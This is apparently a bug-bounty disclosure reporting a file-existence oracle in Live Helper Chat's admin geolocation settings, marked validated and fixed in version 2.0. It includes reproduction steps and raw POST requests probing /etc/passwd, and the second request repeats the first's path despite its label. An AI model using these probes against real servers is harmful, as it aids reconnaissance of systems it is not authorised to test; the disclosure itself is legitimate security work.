Generation of Error Message Containing Sensitive Information in livehelperchat/livehelperchat

Valid

Reported on

Dec 26th 2021


Description

When updating the geolocation detection configuration, we're given the option to specify a file location of a city database file, this can be used to determine if files exist or not. We are not able to see the contents of the file, but we are indeed able to determine if the file exists based on the server's response.

If the file location is highlighted green, we know that the file exists. But if the file location is highlighted red (indicating an error), we know that the file does not exist.

It can also be further confirmed that the file does not exist by right-clicking the red highlight error & inspecting element, then the title of the element would be File does not exist

Steps to Reproduce

  1. Go to /site_admin/chat/geoconfiguration#!#geoconfiguration
  2. Scroll to *Location of city database`
  3. Enter any file location (EX: /etc/passwd2)
  4. Click save
  5. Notice that the file path is highlighted in red, indicating that it doesn't exist.
  6. Then enter a file that does exist (/etc/passwd)
  7. Click save
  8. Notice that the file path is now highlighted in green, indicating that the file exists

Proof of Concept

Request for /etc/passwd2:

POST https://demo.livehelperchat.com/site_admin/chat/geoconfiguration

csfr_token=3e590eb50d05c23820386a0f75ef2c51
GeoDetectionEnabled=on
freegeoip_key
ServerVariableGEOIP_COUNTRY_CODE=GEOIP_COUNTRY_CODE
ServerVariableGEOIP_COUNTRY_NAME=GEOIP_COUNTRY_NAME
ServerVariableGEOIP_CITY=GEOIP_CITY
ServerVariableGEOIP_REGION=GEOIP_REGION
ServerVariableGEOIP_LATITUDE=GEOIP_LATITUDE
ServerVariableGEOIP_LONGITUDE=GEOIP_LONGITUDE
ipapi_key
abstractapi_key
UseGeoIP=max_mind
CityGeoLocation=/etc/passwd2
MaxMindDetectionType=country
ipinfodbAPIKey
locatorhqAPIKey
locatorhqUsername
locatorhqIP=192.168.1.183
StoreGeoIPConfiguration=Save

Request for /etc/passwd:

POST https://demo.livehelperchat.com/site_admin/chat/geoconfiguration

csfr_token=3e590eb50d05c23820386a0f75ef2c51
GeoDetectionEnabled=on
freegeoip_key
ServerVariableGEOIP_COUNTRY_CODE=GEOIP_COUNTRY_CODE
ServerVariableGEOIP_COUNTRY_NAME=GEOIP_COUNTRY_NAME
ServerVariableGEOIP_CITY=GEOIP_CITY
ServerVariableGEOIP_REGION=GEOIP_REGION
ServerVariableGEOIP_LATITUDE=GEOIP_LATITUDE
ServerVariableGEOIP_LONGITUDE=GEOIP_LONGITUDE
ipapi_key
abstractapi_key
UseGeoIP=max_mind
CityGeoLocation=/etc/passwd2
MaxMindDetectionType=country
ipinfodbAPIKey
locatorhqAPIKey
locatorhqUsername
locatorhqIP=192.168.1.183
StoreGeoIPConfiguration=Save

Impact

An attacker can use this to determine which files exist and do not exist in order to better profile the system and gain more data (particularly useful in the reconnaissance phase)

We are processing your report and will contact the livehelperchat team within 24 hours. a year ago
Remigijus Kiminas validated this vulnerability a year ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas marked this as fixed in 2.0 with commit b280be a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation